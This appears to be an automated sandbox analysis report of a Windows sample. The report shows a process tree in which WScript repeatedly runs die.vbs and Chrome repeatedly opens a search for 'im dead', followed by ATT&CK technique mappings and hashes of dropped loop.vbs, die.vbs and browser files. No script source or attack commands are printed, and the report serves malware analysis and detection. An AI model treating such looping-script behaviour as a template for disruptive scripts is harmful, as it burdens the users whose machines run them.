        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:2816
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:2240
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:4004
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:4068
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:3764
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:2864
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:4196
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:3640
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:2724
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:3652
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:3412
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:1996
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:1776
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:1656
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:2536
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:5092
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:5012
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:4484
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:4796
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:4776

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3064

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
73a6dc263cd0733744af3edf0430e73c

SHA1
627cfa8003fb9e8b263ff4c7d5bd33e6c511af51

SHA256
c3a51d91384cbd5b6cf6797e9d82c938ed539a333f1909b3d2542d91a23f9300

SHA512
9387b59fc1767aacaf2995d78ee0cd32b74b040f75fa9036fcf268afdd99add3071e621f5c9748fcffe21c66cf648cd9d2b4c55732487bad3ef78771521342e8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
211KB

MD5
151fb811968eaf8efb840908b89dc9d4

SHA1
7ec811009fd9b0e6d92d12d78b002275f2f1bee1

SHA256
043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

SHA512
83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000002

Filesize
24KB

MD5
c594a826934b9505d591d0f7a7df80b7

SHA1
c04b8637e686f71f3fc46a29a86346ba9b04ae18

SHA256
e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610

SHA512
04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\738184b4bb16e32c_0

Filesize
2KB

MD5
de689ca2f48a302bc0f54c07ea369ae8

SHA1
3d9cfb695bc0492dae01f43e77ddb21b88473f0b

SHA256
06a0cff0e99b8d56744d1605364c348ddbf7f0cc1838ca7f231640aed3511f26

SHA512
d57d7b69e5909c340baf7ad7d5009ad246f7e90b2c22dcdfc62e2066e7a1e415a548b70d9cd040944e7499d62b862ae8e7345e1a46c3677d448e2ea6be9ca377

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\d1c2b674767c9021_0

Filesize
339KB

MD5
292d78eff9ef714d70f6127524761c60

SHA1
cf9919951049733372303b794a152d0523936208

SHA256
4513188dad0a7bb07b334740adc108c31ae85c15f2da56c763b1b6f5789893b3

SHA512
20927dd9535f12b5aff2f4dfdcbda0f2af989b391f31405f7c7c5bbac94092f4c59c9f5d8b790f64d0d2471172a1da0282a50b08a05faacdf1306b035dc994c6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\ec5ea768045d5c65_0

Filesize
289B

MD5
457efad663d1cad473bd813b18d5b3e7

SHA1
6e0b9ba95b04956773171ccd95f4f7e82d8a33f9

SHA256
adec0123dbc4c5c7c11e2f363bdcac9430a739e1bf4f6987a842c647b8643a3e

SHA512
afdcef93e2945307da833dcfff904c9a404c9fb50755e6366b31c326da990ccd990f6ec5ea7dff823096811e536808a177eadaae115412c972efff40188129a4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000009.dbtmp

Filesize
16B

MD5
979c29c2917bed63ccf520ece1d18cda

SHA1
65cd81cdce0be04c74222b54d0881d3fdfe4736c

SHA256
b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53

SHA512
e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Favicons

Filesize
20KB

MD5
8a5dbf6a7d71c82c011c5285cc7d88ce

SHA1
7fed1260a5e8930692146ef47146e9d2b9b47496

SHA256
15b24a3851000b5ce85cb93c1fd27c1f87d73a4a1c03cf079a120b4033a80b29

SHA512
80bc2f34ebb9db126ce7dcececbfbb16e89ebe24711e973bca941e328d07af3e6afa1e4d60801bceb19fe79d63b1e98e47fd5fee0b880b125283ad56e5c14797

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

Filesize
148KB

MD5
fd1b37c0d5e07a03b868ff39ef243564

SHA1
9709f3dac98a50bb232f220e02138df0cd44cc0b

SHA256
98db7319c4d008b30f4f220c09fd4ee7cb8d9579d7c3c3c23854610ea8b6e1e3

SHA512
f771b5abecb81fb1c81774582d577e01b1bd2bc435925e6b8224cdd746fe68218c100c04d115ee8aa1b6482ccd6ebd60e2013e6d811d581ce0632541337ea9d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
60f14f30f54968c055cd1edaf165d98a

SHA1
adce5339747ef7b0432fb7f57f8fc9c0cb463026

SHA256
e6c41f72aecdfd227daf4f73860cdb9d1e889c3ee9797cc2112e10f32d3f760c

SHA512
7841d0cd8c21fdf49efa436bd6cc0b2ad37b1f769ba3a3c085fc7682757512f9ef27b4a3d3368247b8fa5086e49fcd58ad18e7e755a16d95b86e03fcca40af7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
b74c6c745c9905ed7ab5f6088982d95d

SHA1
4b863465fbffaea7548a807fc22973732e823d2f

SHA256
6c2f28e0ff8bc8c39d953f2d34fbf665cbacedc97471f91f7921d57d9e67b7e2

SHA512
a917044cec8ae1df48c2eeb024d56fb87361ef4ec701b12d790d1f96e53b4fe44b73454fd6ac93548b72b8e7ff96d71d4eba0a75e069c2b3c7e4d20357127af1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

Filesize
136B

MD5
a766ffe64c4c9388f29da622ee76a761

SHA1
b75cab810e320988c5a3414a3e12905f8f8f376d

SHA256
8b45fc093614154029f05a9d0ddbf910e90a57077331b43a785423a98c4b6d66

SHA512
493bfaaed22e67389784217d1dc12278287ad34f484c057e6e3942f785299b3a9646c52e99306f7fcaa7586800435c031675700b78486724f6e95a2e184e9a25

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Visited Links

Filesize
128KB

MD5
a190d85c74d59780c409c57fc6209f38

SHA1
26ed7c2f8567693467557cc3f5471f8fef94b960

SHA256
07d4b796a971d3888f66ad63a442e56ddb36acf6e44bc5f5a646f9f1d725b18d

SHA512
4d2abf961f5e6ac037bbd1d90708ae54f964a651c66bfc006cac79034904be8b3c153a1451e7948dabc12ea1c42ca0fb1eaabb1d7a31e1afe667c41bfe6da964

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ca92311d-1a71-456e-8303-95d99689e8d7.tmp

Filesize
6KB

MD5
0d2c329f9884cb8e3a13e2d380b21de3

SHA1
5a0b7b73fa132d4211bfca6bccf83fff079a1665

SHA256
9505fcced3af9e0f8c3470d96da814a29cd7991a223e337e27c3f70325d83a60

SHA512
9c6d343d80a81b5dd94899cf9c3a0ad2c391240b243a3f2166e25b0ac628943291b03c296a79252010b48947e634d559631a9c9065f300db6b654e8f1059beac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000010.dbtmp

Filesize
16B

MD5
60e3f691077715586b918375dd23c6b0

SHA1
476d3eab15649c40c6aebfb6ac2366db50283d1b

SHA256
e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee

SHA512
d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

Filesize
14B

MD5
9eae63c7a967fc314dd311d9f46a45b7

SHA1
caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf

SHA256
4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d

SHA512
bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
307KB

MD5
b84571f64edd2d0397c336e1573fe9c5

SHA1
a5be558776bf009f4c7944ad2f10bdb9207eb8ed

SHA256
3de7a9c4e432fc86cc79983d9d53d3710c796bd4c58d19f8393e1bdedbc02614

SHA512
33f53a95d6d059754aede0d4651262a65100b8b6dfd079ec4df00c86d44135e2cae231a29ea00f04fe50d316d51aecf863bd1fa9da2cefee104bbb3777d7f7fc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
156KB

MD5
cd14eabba50c2e65128bdfa83197697f

SHA1
5fa78acaf5eccfe4be597f2e5248e056bb405f1e

SHA256
839f7cafcd86d8b8f24e6a39d444b86a3c29f906e4d09d33084c443925e44292

SHA512
d5fb4d9c299766a358128b76d57eadad74811fac5ca4c547e50ff04a798f57d8404b43c21b7858c6fbf25863e3fa05c558eae69b83139da0e9506451e71d75e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
86B

MD5
961e3604f228b0d10541ebf921500c86

SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7

SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\a0492eef-9e7e-4bed-9b83-9fd897827cf4.tmp

Filesize
307KB

MD5
340ec9f5f6ff3b26b7981a5300405518

SHA1
7d32cc092dd8cf52b55c2b612b94c57c932030d5

SHA256
00754e50064da5a29683b9ebc429a128e760f1aa6cb75e0fb485f98e5f4fe16b

SHA512
ae5e9ca8b5220ba53226bc573ca0f5d44d2c610093aff93982e0ab8c5f8676fdf8032358b0fd8a1f51b9f4b3543cab445d015b1a85e92ca42b7b2b93234954a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\d8c63c88-b4cd-4e83-8fa3-6cb02b94f5d5.tmp

Filesize
156KB

MD5
e59aee6a85b3b1e0388763096e02c345

SHA1
aa61019174c21176b8464e670aa6b83c5e31b09d

SHA256
5594a8cb087627c34e43f0d3fbe429d618266fa6ec62c53a52a17ff0657b8e46

SHA512
211943323cdbff788f4f8775aabd7383b0ec6df4104d570de6cdac914e01af7e29392f9ae0e0b49def6cf6ca46e283984990e1b4ba8954b1a47cc941de7330be

Download Submit
C:\Windows\die.vbs

Filesize
32B

MD5
b359ce387f90891ebacbbd74ad115a51

SHA1
ea46a4b6433224920c20ec4e5e29a225c2f9a9bd

SHA256
d5d5c0f648b1dd16bae4ec6ca8b66836d39c0c4672b4feaf02adad314808dbd0

SHA512
1edf92cc435fc3695c7674c8403659d3ea800cac400240916b198370e455f1b7737d72337b3a04e50e9fed47e11bef3034b7fba869d69eda6703f9b761ded7fd

Download Submit
C:\Windows\loop.vbs

Filesize
58B

MD5
a1ea23487c900694eb60e50163a705b0

SHA1
9214762e43f4cabf1756898e49ea73f04f3b355d

SHA256
047c8796ad33393c745f83f331f682976aa4cc69557e355d4b4b3f4aec8a4293

SHA512
72356ffc75145402bac0f145a04a049722e732365747ac68f38de6dfcf144d80dac3896a9cc4fddf3e5ac6522ef24596e636b9914b122efc47335ec4ccd08144

Download Submit
C:\Windows\loop.vbs

Filesize
76B

MD5
b7492070efdb4abe9693dd2a9d0c0dd9

SHA1
b070c600fd24f7216868a3d90b31f3aabe774b48

SHA256
7349cd29f7507b9486abacdb5c60be13a667da1107364c41670761cd17604ae7

SHA512
681337efbb77f38c9a66c1acfb32ab3abb99c2c5e243700e236c5ef3132fd3e70098d892bc3c9f994f37ea4b1a042e582ab314e52c0620201cee044cfa34cfb2

Download Submit
C:\Windows\loop.vbs

Filesize
89B

MD5
c4fbc63196b94fc90ee9880027cd2b48

SHA1
7e8c32b5f49a1886f604efc476af1cb2bddb6a1c

SHA256
a011f45e67501d98db568a22619651169d8f441747c121e35e5f0f6e67160803

SHA512
b79bc81de5cda30eee6b5958f570013c112b0d3aba0c94fe0fe9a27da353e43e8f069356d540a2f78a2869f8b22f3d8832bfa1679043d85614e50707397342ce

Download Submit
C:\Windows\loop.vbs

Filesize
157B

MD5
2b45f57b4741dee1bac53a25c254695c

SHA1
7a5b12eb44fdad6a0a2d78c68c7676e7e9f1f036

SHA256
b872d58931baa7dd7d89b4ba64c52b0e0e659d5a4ddbe8de8eeed0f1f0402da6

SHA512
6e39f5f6bf840d1bd06b87905b849b79c9a2175423c8b266bf840163e4d014cb14f8d309a4284535e458920f9d9e16b58bd65743e777a977d6229524535dfa00

Download Submit
C:\Windows\loop.vbs

Filesize
193B

MD5
fc99d843025cbc320d8f3dc20b171e8d

SHA1
9d02fb9978fac6004e2c65f64be6ceadb5376451

SHA256
6a38ef7325e35f34d82334e4bdc4008b079af886cd6611c99b3ff527d7bcecc9

SHA512
cac098cf6bc9abf1cdb2ab0967215ba03ef3c7763dac271be642d451864d6edfed03b64bccd07fa00c2456871f88a095d18770700aa1feec201d267a344152f9

Download Submit
C:\Windows\loop.vbs

Filesize
211B

MD5
ee721e81e732ed9aea585d3ee0705814

SHA1
59fb4609948025255d00dc0f47508a9e1166a8b0

SHA256
d45ae5d6dd161f8ac471396d858b09270cc9ba7e4f9050f8e19c66df44479e23

SHA512
ab0f28c10844c7d1e659b0de0e5fb94eab3508717c44c560dba3e01bca4295c35929edb2db855fc1ab7ffc1bd79061433ba9c67d91db09ad3ea1c7e8a8683f2a

Download Submit
C:\Windows\loop.vbs

Filesize
218B

MD5
91d0599d7a681e6935417d54cebfc23d

SHA1
73f44599eabd428d292b1ac639041e5b51eb6f22

SHA256
191e355fe4baeafe96661deb139af79c8b246e6d961c14dd096105a57d4980e4

SHA512
5cb882f526d03f7aa466ba7f9d31404f168ee7f7c33f80175f6395f080a6625a6d4d5554c4d59b6fb0e5cb57fc9169663074e679638d53f928dab12b6a11320e

Download Submit
memory/2300-4-0x000007FEF59FE000-0x000007FEF59FF000-memory.dmp

Filesize
4KB

Download
memory/2300-10-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/2300-9-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/2300-8-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/2300-7-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download
memory/2300-6-0x0000000001D00000-0x0000000001D08000-memory.dmp

Filesize
32KB

Download
memory/2300-5-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2300-40-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp

Filesize
9.6MB

Download